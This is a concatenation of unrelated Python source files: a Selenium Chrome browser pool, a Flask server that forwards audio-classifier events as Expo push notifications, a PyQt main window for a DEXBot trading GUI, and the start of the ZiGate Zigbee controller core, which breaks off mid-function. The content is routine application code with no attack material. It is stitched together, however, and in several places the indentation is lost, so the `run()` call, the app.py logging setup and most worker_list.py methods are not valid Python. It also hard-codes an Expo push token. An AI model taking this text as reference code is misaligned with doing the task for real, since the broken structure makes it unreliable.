# Chrome defaults. bug fix: use_chrome_options is now always defined --
# previously it was only assigned inside the conditional, so with
# load_picture=True and head_less=False, Browser.__init__ would raise
# NameError when reading it.
use_chrome_options = False
chrome_options = None
if not load_picture or head_less:
    use_chrome_options = True
    chrome_options = Options()
    if not load_picture:
        # content setting value 2 == block images
        chrome_options.add_experimental_option('prefs', {
            'profile.default_content_setting_values': {
                'images': 2
            }
        })
    if head_less:
        chrome_options.add_argument('--headless')
#============= Program ====================
class Browser_Pool:
    '''
    Browser pool: hands out shared Chrome instances to requesters via a
    dispatcher thread and reclaims them under memory pressure.
    '''
    def __init__(self):
        # all live Browser instances managed by this pool
        self.browsers = []
        # pending _Bowl requests waiting for a free browser
        self._acquire_queue = Queue(maxsize=-1)
        # set to True by close() to stop the background threads
        self._done = False
        self._create_browser()
        self._acquire()
        self._cleaner()
    def _create_browser(self):
        '''
        Pre-create browsers (only in eager mode with a fixed pool size).
        '''
        def create(id):
            # id is the browser's sequence number within the pool
            browser = Browser(id, self)
            self.browsers.append(browser)
        threads = []
        if not lazy_load and browser_amount>0:
            for index in range(browser_amount):
                thread = threading.Thread(target=create, args=(index,))
                thread.start()
                threads.append(thread)
            for thread in threads:
                thread.join()
    def close(self):
        '''
        Destroy the pool: drain all browsers, then stop the worker threads.
        '''
        self.clean()
        self._done = True
    def _acquire(self,):
        '''
        Start the background thread that listens for acquire requests and
        assigns free (or newly created) browsers to them.
        '''
        def distribut():
            while not self._done:
                try:
                    bowl = self._acquire_queue.get(timeout=0.5)
                except Empty:
                    if self._done:
                        break
                    else:
                        continue
                found = False
                while not found:
                    # first try to reuse an idle browser
                    for browser in self.browsers:
                        if browser.vailiable:
                            browser.vailiable = False
                            bowl.bowl = browser
                            found = True
                            break
                    # cleaner requests must not block once the pool is empty
                    if bowl.isclean : break
                    # otherwise grow the pool, if size limit and memory allow
                    if not found and (browser_amount<1 or len(self.browsers)<browser_amount) \
                            and psutil.virtual_memory().percent<memory_rate:
                        browser = Browser(len(self.browsers), self)
                        self.browsers.append(browser)
                        browser.vailiable = False
                        bowl.bowl = browser
                        found = True
                    if not found:
                        time.sleep(0.05)
        threading.Thread(target=distribut).start()
    class _Bowl:
        '''
        Placeholder ("bowl") a requester busy-waits on until the dispatcher
        drops a browser into it.
        '''
        def __init__(self, isclean = False):
            # isclean marks requests issued by the cleaner thread
            self.isclean = isclean
            self.bowl = None
    def acquire(self):
        '''
        Request a browser; blocks until one has been assigned.
        '''
        bowl = self._Bowl()
        self._acquire_queue.put(bowl)
        while bowl.bowl == None:
            time.sleep(0.05)
        return bowl.bowl
    def _acquire_for_cleaner(self):
        '''
        Request a browser on behalf of the cleaner; gives up (may return
        None) once the pool is empty.
        '''
        bowl = self._Bowl(isclean=True)
        self._acquire_queue.put(bowl)
        while bowl.bowl == None and len(self.browsers)>0:
            time.sleep(0.05)
        return bowl.bowl
    def _cleaner(self):
        '''
        Self-cleaning: while memory usage is at/above memory_rate, destroy
        surplus browsers automatically.
        '''
        def cleanner():
            while not self._done:
                if psutil.virtual_memory().percent >= memory_rate:
                    browser = self._acquire_for_cleaner()
                    if browser != None:
                        browser.destroy_by_force()
                time.sleep(0.05)
        threading.Thread(target=cleanner).start()
    def clean(self):
        '''
        Empty the pool, destroying every browser.
        '''
        def destroy_browser(browser):
            if browser != None:
                c_out('浏览器[{}] 已被销毁。'.format(browser.id))
                browser.destroy_by_force()
        while len(self.browsers)>0:
            browser = self._acquire_for_cleaner()
            threading.Thread(target=destroy_browser, args=(browser,)).start()
            time.sleep(0.05)
class Browser(webdriver.Chrome):
    '''
    Browser driver: a Chrome webdriver instance tracked by a Browser_Pool.
    '''
    def __init__(self, id : int = -1, browser_pool=None):
        '''
        Initialize the underlying Chrome driver.
        :param id: browser id; the default (-1) means nameless
        :param browser_pool: owning Browser_Pool, or None for standalone use
        '''
        if use_chrome_options:
            super(Browser, self).__init__(chrome_options = chrome_options)
        else:
            super(Browser, self).__init__()
        self.browser_pool = None
        self.id = id
        # True while idle, i.e. this browser may be handed to a requester
        self.vailiable = True
        if browser_pool != None:
            self.browser_pool = browser_pool
        c_out('浏览器[{}] 已被创建。'.format(id))
        if minimize:
            self.set_window_size(0, 0)
    def release(self, str = None):
        # Return this browser to the pool; optionally print a message first.
        # NOTE(review): the `str` parameter shadows the builtin; kept as-is
        # for interface compatibility.
        if str != None:
            print(str)
        self.get('about:blank')
        self.vailiable = True
        c_out('浏览器编号[{}] 已被释放。'.format(self.id))
    def destroy_by_force(self):
        # Quit the driver and detach from the pool.
        # NOTE(review): assumes browser_pool is not None -- a standalone
        # instance would raise AttributeError here; confirm with callers.
        self.quit()
        self.browser_pool.browsers.remove(self)
    def browser_amount(self):
        # Report the current number of browsers in the owning pool.
        amount = len(self.browser_pool.browsers)
        c_out('当前浏览器数量 : {}'.format(amount))
        return amount
def c_out(*args):
    """Print *args* in green, unless the module-level log_silence flag
    suppresses output entirely."""
    if log_silence:
        return
    print('\033[0;32;0m', end='')
    print(*args, '\033[0m')
#=============== Object =======================
# 浏览器池 引用
browser_pool = Browser_Pool()
#=============== Test =======================
def run():
    # smoke test: acquire a browser, load a page, release it, shut the
    # pool down
    import time
    browser = browser_pool.acquire()
    browser.get('http://baidu.com')
    browser.release()
    time.sleep(1)
    browser_pool.close()
if __name__ == '__main__':
run()
|
app.py | #----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
from flask import Flask, render_template, request
# from flask.ext.sqlalchemy import SQLAlchemy
import logging
from logging import Formatter, FileHandler
from forms import *
import os
import sys
from sys import stderr
import json
import threading
from exponent_server_sdk import DeviceNotRegisteredError
from exponent_server_sdk import PushClient
from exponent_server_sdk import PushMessage
from exponent_server_sdk import PushResponseError
from exponent_server_sdk import PushServerError
from requests.exceptions import ConnectionError
from requests.exceptions import HTTPError
from babyClass import loop
#----------------------------------------------------------------------------#
# Data
#----------------------------------------------------------------------------#
tokens = []
TEST_TOKEN = 'ExponentPushToken[2AOjhoJRkkJVEpl2FoWwuc]'
EXTENSIONS = ['wav', 'mp3']
events = []
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
app = Flask(__name__)
app.config.from_object('config')
#db = SQLAlchemy(app)
# Automatically tear down SQLAlchemy.
'''
@app.teardown_request
def shutdown_session(exception=None):
db_session.remove()
'''
# Login required decorator.
'''
def login_required(test):
@wraps(test)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return test(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('login'))
return wrap
'''
# Methods
# Basic arguments. You should extend this function with the push features you
# want to use, or simply pass in a `PushMessage` object.
def send_push_message(token, message, extra=None):
    """Send a push notification via Expo and validate the response.

    :param token: Expo push token of the recipient device
    :param message: notification body text
    :param extra: optional dict attached as the message's `data` payload
    Raises push/connection errors to the caller after logging them.
    """
    logger = logging.getLogger(__name__)
    try:
        response = PushClient().publish(
            PushMessage(to=token,
                        body=message,
                        data=extra))
    except PushServerError as exc:
        # Encountered some likely formatting/validation error.
        # bug fix: the original called rollbar.report_exc_info(), but rollbar
        # is never imported in this app, turning every failure into NameError.
        logger.exception(
            'push server error: token=%s message=%s extra=%s errors=%s response_data=%s',
            token, message, extra, exc.errors, exc.response_data)
        raise
    except (ConnectionError, HTTPError):
        # Encountered some Connection or HTTP error.
        # bug fix: `raise self.retry(exc=exc)` was copy-pasted from a Celery
        # task -- `self` does not exist in a plain function -- so propagate.
        logger.exception('connection error sending push: token=%s', token)
        raise
    try:
        # We got a response back, but we don't know whether it's an error yet.
        # This call raises errors so we can handle them with normal exception
        # flows.
        response.validate_response()
    except DeviceNotRegisteredError:
        # Mark the push token as inactive. bug fix: the original imported
        # `notifications.models` (a Django app that does not exist in this
        # project); drop the dead token from our in-memory list instead.
        if token in tokens:
            tokens.remove(token)
    except PushResponseError as exc:
        # Encountered some other per-notification error.
        logger.exception(
            'push response error: token=%s push_response=%s',
            token, exc.push_response._asdict())
        raise
def valid_file(filename):
    """Return True if *filename* has an extension listed in EXTENSIONS."""
    _, dot, ext = filename.rpartition('.')
    return bool(dot) and ext.lower() in EXTENSIONS
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/')
def home():
    # Landing page.
    return render_template('pages/placeholder.home.html')
@app.route('/getdata', methods=['GET'])
def getData():
    # Return the notification events recorded so far as a JSON list.
    return json.dumps(events)
@app.route('/sendaudio', methods=['POST'])
def send_audio():
    """Accept an uploaded audio file and stage it for the classifier.

    bug fix: the original implicitly returned None when the upload was
    missing or had a bad extension, which made Flask raise a 500; reply
    with an explicit 400 instead.
    """
    print(request.files)
    f = request.files.get('file', None)
    if f and valid_file(f.filename):
        f.save('../classfier/sound-downloader/testing/recording.wav')
        return '''<h1>Audio sent</h1>'''
    return '''<h1>Invalid or missing audio file</h1>''', 400
@app.route('/notify', methods=['POST'])
def notify():
    # Push the classifier's event type to the hard-coded test device and
    # record it so /getdata can report it.
    notify_type = request.json['type']
    print(notify_type, 'NOTIFIED', file=stderr)
    # if (len(tokens) > 0):
    send_push_message(TEST_TOKEN, notify_type)
    events.append(notify_type)
    # else:
    #     print('Notification not sent: no token found', file=stderr)
    return '''<h1>notified {}</h1>'''.format(notify_type)
@app.route('/register', methods=['POST'])
def register():
    """Store a device's Expo push token for later notifications."""
    tokens.append(request.json['token']['value'])
    print(request.json['token']['value'], 'TOKEN RECEIVED', file=stderr)
    # bug fix: the original response was missing the closing </h1> tag
    return '''<h1>token received. tokens now {}</h1>'''.format(tokens)
@app.route('/about')
def about():
    # About page.
    return render_template('pages/placeholder.about.html')
# Error handlers.
@app.errorhandler(500)
def internal_error(error):
    # Render the custom 500 page.
    # db_session.rollback()  (disabled: no SQLAlchemy session in use)
    return render_template('errors/500.html'), 500
@app.errorhandler(404)
def not_found_error(error):
    # Render the custom 404 page.
    return render_template('errors/404.html'), 404
if not app.debug:
file_handler = FileHandler('error.log')
file_handler.setFormatter(
Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
)
app.logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
if __name__ == '__main__':
threading.Thread(target=loop).start()
app.run(host='bigrip.ocf.berkeley.edu')
# Or specify port manually:
'''
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
'''
|
worker_list.py | import time
from threading import Thread
import webbrowser
from dexbot import __version__
from dexbot.config import Config
from dexbot.controllers.wallet_controller import WalletController
from dexbot.views.create_wallet import CreateWalletView
from dexbot.views.create_worker import CreateWorkerView
from dexbot.views.errors import gui_error
from dexbot.views.layouts.flow_layout import FlowLayout
from dexbot.views.settings import SettingsView
from dexbot.views.ui.worker_list_window_ui import Ui_MainWindow
from dexbot.views.unlock_wallet import UnlockWalletView
from dexbot.views.worker_item import WorkerItemWidget
from dexbot.qt_queue.idle_queue import idle_add
from dexbot.qt_queue.queue_dispatcher import ThreadDispatcher
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtGui import QFontDatabase
from PyQt5.QtWidgets import QMainWindow
from grapheneapi.exceptions import NumRetriesReached
class MainView(QMainWindow, Ui_MainWindow):
def __init__(self, main_controller):
    """Build the main window, wire the GUI buttons, and show the initial
    (disconnected) status."""
    super().__init__()
    self.setupUi(self)
    self.main_controller = main_controller
    self.config = main_controller.config
    # limit on concurrent workers so the GUI performance isn't affected
    self.max_workers = 10
    self.num_of_workers = 0
    # worker name -> WorkerItemWidget
    self.worker_widgets = {}
    self.closing = False
    # background thread started on login; see handle_login
    self.status_bar_updater = None
    self.statusbar_updater_first_run = True
    self.main_controller.set_info_handler(self.set_worker_status)
    self.layout = FlowLayout(self.scrollAreaContent)
    self.dispatcher = None
    # GUI buttons
    self.add_worker_button.clicked.connect(self.handle_add_worker)
    self.settings_button.clicked.connect(self.handle_open_settings)
    self.help_button.clicked.connect(self.handle_open_documentation)
    self.unlock_wallet_button.clicked.connect(self.handle_login)
    # Hide certain buttons by default until login success
    self.add_worker_button.hide()
    self.status_bar.showMessage("ver {} - Node disconnected".format(__version__))
    QFontDatabase.addApplicationFont(":/bot_widget/font/SourceSansPro-Bold.ttf")
def connect_to_bitshares(self):
    """Try to connect to the configured node(s).

    Returns True on success; on failure shows the reason in the status
    bar and returns False.
    """
    # Check if there is already a connection
    if self.config['node']:
        # Test nodes first. This only checks if we're able to connect
        self.status_bar.showMessage('Connecting to LocalCoin...')
        try:
            self.main_controller.measure_latency(self.config['node'])
        except NumRetriesReached:
            # typo fix: "Coudn't" -> "Couldn't" in the user-visible message
            self.status_bar.showMessage('ver {} - Couldn\'t connect to LocalCoin. '
                                        'Please use different node(s) and retry.'.format(__version__))
            self.main_controller.set_bitshares_instance(None)
            return False
        self.main_controller.new_bitshares_instance(self.config['node'])
        self.status_bar.showMessage(self.get_statusbar_message())
        return True
    else:
        # Config has no nodes in it
        self.status_bar.showMessage('ver {} - Node(s) not found. '
                                    'Please add node(s) from settings.'.format(__version__))
        return False
@pyqtSlot(name='handle_login')
def handle_login(self):
    # Connect (if needed), then unlock or create the wallet; on success
    # reveal the worker UI and start the background updater threads.
    if not self.main_controller.bitshares_instance:
        if not self.connect_to_bitshares():
            return
    wallet_controller = WalletController(self.main_controller.bitshares_instance)
    if wallet_controller.wallet_created():
        unlock_view = UnlockWalletView(wallet_controller)
    else:
        unlock_view = CreateWalletView(wallet_controller)
    if unlock_view.exec_():
        # Hide button once successful wallet creation / login
        self.unlock_wallet_button.hide()
        self.add_worker_button.show()
        # Load worker widgets from config file
        workers = self.config.workers_data
        for worker_name in workers:
            self.add_worker_widget(worker_name)
            # Limit the max amount of workers so that the performance isn't
            # greatly affected
            if self.num_of_workers >= self.max_workers:
                self.add_worker_button.setEnabled(False)
                break
        # Dispatcher polls for events from the workers that are used to
        # change the ui
        self.dispatcher = ThreadDispatcher(self)
        self.dispatcher.start()
        self.status_bar.showMessage("ver {} - Node delay: - ms".format(__version__))
        self.status_bar_updater = Thread(target=self._update_statusbar_message)
        self.status_bar_updater.start()
def add_worker_widget(self, worker_name):
config = self.config.get_worker_config(worker_name)
widget = WorkerItemWidget(worker_name, config, self.main_controller, self)
widget.setFixedSize(widget.frameSize())
self.layout.addWidget(widget)
self.worker_widgets[worker_name] = widget
# Limit the max amount of workers so that the performance isn't greatly affected
self.num_of_workers += 1
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
def remove_worker_widget(self, worker_name):
self.worker_widgets.pop(worker_name, None)
self.num_of_workers -= 1
if self.num_of_workers < self.max_workers:
self.add_worker_button.setEnabled(True)
def change_worker_widget_name(self, old_worker_name, new_worker_name):
worker_data = self.worker_widgets.pop(old_worker_name)
self.worker_widgets[new_worker_name] = worker_data
@pyqtSlot(name='handle_add_worker')
@gui_error
def handle_add_worker(self):
create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)
return_value = create_worker_dialog.exec_()
# User clicked save
if return_value == 1:
worker_name = create_worker_dialog.worker_name
self.main_controller.create_worker(worker_name)
self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)
self.add_worker_widget(worker_name)
@pyqtSlot(name='handle_open_settings')
@gui_error
def handle_open_settings(self):
settings_dialog = SettingsView()
reconnect = settings_dialog.exec_()
if reconnect:
# Reinitialize config after closing the settings window
self.config = Config()
self.main_controller.config = self.config
self.connect_to_bitshares()
@staticmethod
@pyqtSlot(name='handle_open_documentation')
def handle_open_documentation():
webbrowser.open('https://github.com/LocalCoinIS/DEXBot/wiki')
def set_worker_name(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_name(value)
def set_worker_account(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_account(value)
def set_worker_profit(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_profit(value)
def set_worker_market(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_market(value)
def set_worker_slider(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_slider(value)
def customEvent(self, event):
# Process idle_queue_dispatcher events
event.callback()
def closeEvent(self, event):
self.closing = True
self.status_bar.showMessage("Closing app...")
if self.status_bar_updater and self.status_bar_updater.is_alive():
self.status_bar_updater.join()
def _update_statusbar_message(self):
while not self.closing:
# When running first time the workers are also interrupting with the connection
# so we delay the first time to get correct information
if self.statusbar_updater_first_run:
self.statusbar_updater_first_run = False
time.sleep(1)
msg = self.get_statusbar_message()
idle_add(self.set_statusbar_message, msg)
runner_count = 0
# Wait for 30s but do it in 0.5s pieces to not prevent closing the app
while not self.closing and runner_count < 60:
runner_count += 1
time.sleep(0.5)
def get_statusbar_message(self):
node = self.main_controller.bitshares_instance.rpc.url
try:
latency = self.main_controller.measure_latency(node)
except BaseException:
latency = -1
if latency != -1:
return "ver {} - Node delay: {:.2f}ms - node: {}".format(__version__, latency, node)
else:
return "ver {} - Node disconnected".format(__version__)
def set_statusbar_message(self, msg):
self.status_bar.showMessage(msg)
def set_worker_status(self, worker_name, level, status):
if worker_name != 'NONE':
worker = self.worker_widgets.get(worker_name, None)
if worker:
worker.set_status(status)
|
core.py | #! /usr/bin/python3
#
# Copyright (c) 2018 Sébastien RAMAGE
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from binascii import hexlify
import traceback
from time import (sleep, strftime, monotonic)
import logging
import json
import os
from pydispatch import dispatcher
from .transport import (ThreadSerialConnection,
ThreadSocketConnection,
FakeTransport)
from .responses import (RESPONSES, Response)
from .const import (ACTIONS_COLOR, ACTIONS_LEVEL, ACTIONS_LOCK, ACTIONS_HUE,
ACTIONS_ONOFF, ACTIONS_TEMPERATURE, ACTIONS_COVER,
ACTIONS_THERMOSTAT, ACTIONS_IAS,
OFF, ON, TYPE_COORDINATOR, STATUS_CODES,
ZIGATE_ATTRIBUTE_ADDED, ZIGATE_ATTRIBUTE_UPDATED,
ZIGATE_DEVICE_ADDED, ZIGATE_DEVICE_REMOVED,
ZIGATE_DEVICE_UPDATED, ZIGATE_DEVICE_ADDRESS_CHANGED,
ZIGATE_PACKET_RECEIVED, ZIGATE_DEVICE_NEED_DISCOVERY,
ZIGATE_RESPONSE_RECEIVED, DATA_TYPE, BASE_PATH)
from .clusters import (Cluster, get_cluster)
import functools
import struct
import threading
import random
from enum import Enum
import colorsys
import datetime
try:
    import RPi.GPIO as GPIO
except Exception:
    # Fake GPIO stand-in for platforms without RPi.GPIO: every attribute
    # resolves to a no-op method that only logs an error.
    class GPIO:
        def fake(self, *args, **kwargs):
            LOGGER.error('GPIO Not available')

        def __getattr__(self, *args, **kwargs):
            return self.fake
    # Replace the class with a singleton instance so GPIO.<anything>() works
    GPIO = GPIO()
import usb
LOGGER = logging.getLogger('zigate')
AUTO_SAVE = 5 * 60  # 5 minutes
BIND_REPORT = True  # automatically bind and report state for light
SLEEP_INTERVAL = 0.1  # polling period (seconds) of the event loop
ACTIONS = {}  # action name -> list of method names; filled by @register_actions
WAIT_TIMEOUT = 5  # seconds to wait for a status/response before giving up
DETECT_FASTCHANGE = False  # enable fast change detection
DELAY_FASTCHANGE = 1.0  # delay fast change for cluster 0x0006
# Device id
ACTUATORS = [0x0009, 0x0010, 0x0051, 0x000a,
             0x010a, 0x010b, 0x010c, 0x010d,
             0x0100, 0x0101, 0x0102, 0x0103, 0x0105, 0x0110,
             0x0200, 0x0202, 0x0210, 0x0220,
             0x0301,
             0x0403]
# On/off light 0x0000
# On/off plug-in unit 0x0010
# Dimmable light 0x0100
# Dimmable plug-in unit 0x0110
# Color light 0x0200
# Extended color light 0x0210
# Color temperature light 0x0220
# On/Off Light 0x0100 Section 3.1
# Dimmable Light 0x0101 Section 3.2
# Colour Dimmable Light 0x0102 Section 3.3
# On/Off Light Switch 0x0103 Section 3.4
# Dimmer Switch 0x0104 Section 3.5
# Colour Dimmer Switch 0x0105 Section 3.6
# Light Sensor 0x0106 Section 3.7
# Occupancy Sensor 0x0107 Section 3.8
# On/Off Ballast 0x0108 Section 3.9
# Dimmable Ballast 0x0109 Section 3.10
# On/Off Plug-in Unit 0x010A Section 3.11
# Dimmable Plug-in Unit 0x010B Section 3.12
# Colour Temperature Light 0x010C Section 3.13
# Extended Colour Light 0x010D Section 3.14
# Light Level Sensor 0x010E Section 3.15
# Colour Controller 0x0800 Section 3.16
# Colour Scene Controller 0x0810 Section 3.17
# Non-Colour Controller 0x0820 Section 3.18
# Non-Colour Scene Controller 0x0830 Section 3.19
# Control Bridge 0x0840 Section 3.20
# On/Off Sensor 0x0850 Section 3.21
def register_actions(action):
    '''
    Decorator factory: record the decorated method's name under *action*
    in the module-level ACTIONS registry and return the method unchanged.
    '''
    def decorator(func):
        ACTIONS.setdefault(action, []).append(func.__name__)
        return func
    return decorator
class AddrMode(Enum):
    # ZiGate addressing modes used in command payloads
    bound = 0
    group = 1
    short = 2
    ieee = 3
def hex_to_rgb(h):
    '''Convert a hex colour string like '#rrggbb' to an (r, g, b) tuple of floats in [0, 1].'''
    digits = h.strip('#')
    pairs = (digits[0:2], digits[2:4], digits[4:6])
    return tuple(int(pair, 16) / 255 for pair in pairs)
def rgb_to_xy(rgb):
    '''Convert an (r, g, b) tuple (floats in [0, 1]) to a CIE xy chromaticity tuple.'''
    def linearize(c):
        # inverse sRGB companding
        return ((c + 0.055) / (1.0 + 0.055)) ** 2.4 if c > 0.04045 else c / 12.92

    r, g, b = (linearize(channel) for channel in rgb)
    X = r * 0.664511 + g * 0.154324 + b * 0.162028
    Y = r * 0.283881 + g * 0.668433 + b * 0.047685
    Z = r * 0.000088 + g * 0.072310 + b * 0.986039
    total = X + Y + Z
    if total == 0:
        # black: chromaticity is undefined, report (0, 0)
        return (0, 0)
    return (X / total, Y / total)
def hex_to_xy(h):
    ''' convert hex color to xy tuple '''
    # Compose the two helpers: '#rrggbb' -> (r, g, b) -> CIE (x, y)
    return rgb_to_xy(hex_to_rgb(h))
def dispatch_signal(signal=dispatcher.Any, sender=dispatcher.Anonymous,
                    *arguments, **named):
    '''
    Dispatch signal with exception proof

    Sends *signal* through pydispatch; any exception raised by a receiver
    is logged instead of propagating into the caller.
    '''
    LOGGER.debug('Dispatch %s', signal)
    try:
        dispatcher.send(signal, sender, *arguments, **named)
    except Exception:
        LOGGER.error('Exception dispatching signal %s', signal)
        LOGGER.error(traceback.format_exc())
def ftdi_set_bitmode(dev, bitmask):
    '''
    Set CBUS bit mode on the FTDI chip of a ZiGate DIN module.

    :param dev: pyusb device handle for the FTDI chip
    :param bitmask: CBUS directions/values nibble pair to apply
    '''
    BITMODE_CBUS = 0x20
    SIO_SET_BITMODE_REQUEST = 0x0b
    bmRequestType = usb.util.build_request_type(usb.util.CTRL_OUT,
                                                usb.util.CTRL_TYPE_VENDOR,
                                                usb.util.CTRL_RECIPIENT_DEVICE)
    # BUG FIX: per FTDI's SET_BITMODE request, wValue = (mode << 8) | mask.
    # The previous code shifted by BITMODE_CBUS (i.e. << 32), overflowing
    # the 16-bit wValue field.
    wValue = bitmask | (BITMODE_CBUS << 8)
    dev.ctrl_transfer(bmRequestType, SIO_SET_BITMODE_REQUEST, wValue)
class ZiGate(object):
def __init__(self, port='auto', path='~/.zigate.json',
             auto_start=True,
             auto_save=True,
             channel=None,
             adminpanel=False):
    '''
    Create a ZiGate controller.

    :param port: serial port of the ZiGate, or 'auto' to autodetect
    :param path: persistent-state JSON file path (None disables persistence)
    :param auto_start: run the startup() sequence immediately
    :param auto_save: periodically save state via start_auto_save()
    :param channel: Zigbee channel passed to startup()
    :param adminpanel: also start the web admin panel
    '''
    self._model = 'TTL'  # TTL, WiFI, DIN, GPIO
    self._devices = {}  # short addr -> Device
    self._groups = {}
    self._scenes = {}
    self._led = True
    self._neighbours_table_cache = []
    self._building_neighbours_table = False
    self._path = path
    self._version = None
    self._port = port
    self._last_response = {}  # response to last command type
    self._last_status = {}  # status to last command type
    self._save_lock = threading.Lock()
    self._autosavetimer = None
    self._closing = False
    self.connection = None
    self._addr = '0000'
    self._ieee = None
    self.panid = 0
    self.extended_panid = 0
    self.channel = 0
    self._started = False
    self._no_response_count = 0
    self._ota_reset_local_variables()
    # DIN modules may be left in bootloader mode; force running mode first
    if self.model == 'DIN':
        self.set_running_mode()
    if adminpanel:
        self.start_adminpanel()
    if auto_start:
        self.startup(channel)
    if auto_save:
        self.start_auto_save()
@property
def model(self):
    '''
    return ZiGate model:
    TTL, WiFi, GPIO, DIN
    '''
    # An FTDI 0403:6001 transport identifies the DIN module
    if self.connection:
        if self.connection.vid_pid() == (0x0403, 0x6001):
            self._model = 'DIN'
    return self._model
def set_bootloader_mode(self):
    '''
    configure ZiGate DIN in flash mode

    Drives the FTDI CBUS pins through a fixed toggle sequence to switch
    the DIN module into its bootloader; no-op on other models.
    '''
    if self.model != 'DIN':
        LOGGER.warning('Method only supported on ZiGate DIN')
        return
    dev = usb.core.find(idVendor=0x0403, idProduct=0x6001)
    if not dev:
        LOGGER.error('ZiGate DIN not found.')
        return
    ftdi_set_bitmode(dev, 0x00)
    sleep(0.5)
    # Set CBUS2/3 high...
    ftdi_set_bitmode(dev, 0xCC)
    sleep(0.5)
    # Set CBUS2/3 low...
    ftdi_set_bitmode(dev, 0xC0)
    sleep(0.5)
    ftdi_set_bitmode(dev, 0xC4)
    sleep(0.5)
    # Set CBUS2/3 back to tristate
    ftdi_set_bitmode(dev, 0xCC)
    sleep(0.5)
def set_running_mode(self):
    '''
    configure ZiGate DIN in running mode

    Reverses set_bootloader_mode(); no-op on non-DIN models.
    '''
    if self.model != 'DIN':
        LOGGER.warning('Method only supported on ZiGate DIN')
        return
    dev = usb.core.find(idVendor=0x0403, idProduct=0x6001)
    if not dev:
        LOGGER.error('ZiGate DIN not found.')
        return
    ftdi_set_bitmode(dev, 0xC8)
    sleep(0.5)
    ftdi_set_bitmode(dev, 0xCC)
    sleep(0.5)
def flash_firmware(self, path, erase_eeprom=False):
    '''
    flash specified firmware

    :param path: firmware image file to write
    :param erase_eeprom: also erase the EEPROM before flashing
    Only supported on the DIN model; switches to bootloader mode,
    flashes, then returns to running mode.
    '''
    if self.model != 'DIN':
        LOGGER.warning('Method only supported on ZiGate DIN')
        return
    from .flasher import flash
    self.set_bootloader_mode()
    flash(self._port, write=path, erase=erase_eeprom)
    self.set_running_mode()
@property
def ieee(self):
    # ZiGate's own IEEE (64-bit) address, set by get_network_state()
    return self._ieee
@property
def addr(self):
    # ZiGate's own short (16-bit) address, set by get_network_state()
    return self._addr
def start_adminpanel(self, port=None, mount=None, prefix=None, debug=False):
    '''
    Start Admin panel in other thread

    :param port: TCP port (defaults to ADMINPANEL_PORT)
    :return: the started admin panel instance
    '''
    from .adminpanel import start_adminpanel, ADMINPANEL_PORT
    port = port or ADMINPANEL_PORT
    self.adminpanel = start_adminpanel(self, port=port, mount=mount, prefix=prefix, quiet=not debug, debug=debug)
    return self.adminpanel
def _event_loop(self):
    '''
    Main polling loop: pull raw packets off the transport queue, announce
    them via ZIGATE_PACKET_RECEIVED, and decode each in its own daemon
    thread. Runs until close() sets self._closing.
    '''
    while not self._closing:
        if self.connection and not self.connection.received.empty():
            packet = self.connection.received.get()
            dispatch_signal(ZIGATE_PACKET_RECEIVED, self, packet=packet)
            # daemon=True replaces the deprecated setDaemon() call
            t = threading.Thread(target=self.decode_data, args=(packet,),
                                 name='ZiGate-Decode data',
                                 daemon=True)
            t.start()
        else:
            sleep(SLEEP_INTERVAL)
def setup_connection(self):
    # Default transport: serial; subclasses override for WiFi/fake transports
    self.connection = ThreadSerialConnection(self, self._port)
def close(self):
    '''Stop the event loop, cancel autosave and close the transport.'''
    self._closing = True
    if self._autosavetimer:
        self._autosavetimer.cancel()
    try:
        if self.connection:
            self.connection.close()
    except Exception:
        LOGGER.error('Exception during closing')
        LOGGER.error(traceback.format_exc())
    self.connection = None
    self._started = False
def save_state(self, path=None):
    '''
    Serialize devices, groups, scenes, neighbours table and LED state to
    the persistent JSON file.

    :param path: override the persistent file path (default: self._path);
                 None disables persistence and cancels the autosave timer
    '''
    LOGGER.debug('Saving persistent file')
    path = path or self._path
    if path is None:
        LOGGER.warning('Persistent file is disabled')
        if self._autosavetimer:
            self._autosavetimer.cancel()
        return
    self._path = os.path.expanduser(path)
    LOGGER.debug('Acquire Lock to save persistent file')
    r = self._save_lock.acquire(True, 5)
    if not r:
        LOGGER.error('Failed to acquire Lock to save persistent file')
        return
    # FIX: release in a finally block so the lock cannot stay held if
    # anything above/inside raises unexpectedly, which would deadlock
    # every later save.
    try:
        data = {'devices': list(self._devices.values()),
                'groups': self._groups,
                'scenes': self._scenes,
                'neighbours_table': self._neighbours_table_cache,
                'led': self._led
                }
        with open(self._path, 'w') as fp:
            json.dump(data, fp, cls=DeviceEncoder,
                      sort_keys=True, indent=4, separators=(',', ': '))
    except Exception:
        LOGGER.error('Failed to save persistent file %s', self._path)
        LOGGER.error(traceback.format_exc())
    finally:
        LOGGER.debug('Release Lock of persistent file')
        self._save_lock.release()
def load_state(self, path=None):
    '''
    Load devices, groups, scenes, neighbours table and LED state from the
    persistent JSON file. Returns True on success, False on failure.
    '''
    LOGGER.debug('Try loading persistent file')
    path = path or self._path
    if path is None:
        LOGGER.warning('Persistent file is disabled')
        return
    self._path = os.path.expanduser(path)
    LOGGER.debug('Trying to load %s', self._path)
    if not os.path.exists(self._path):
        LOGGER.warning('Persistent file %s doesn\'t exist', self._path)
        return False
    try:
        with open(self._path) as fp:
            data = json.load(fp)
        if not isinstance(data, dict):  # old version
            data = {'devices': data, 'groups': {}}
        groups = data.get('groups', {})
        # Group members are stored as JSON lists; restore them as sets of tuples
        for k, v in groups.items():
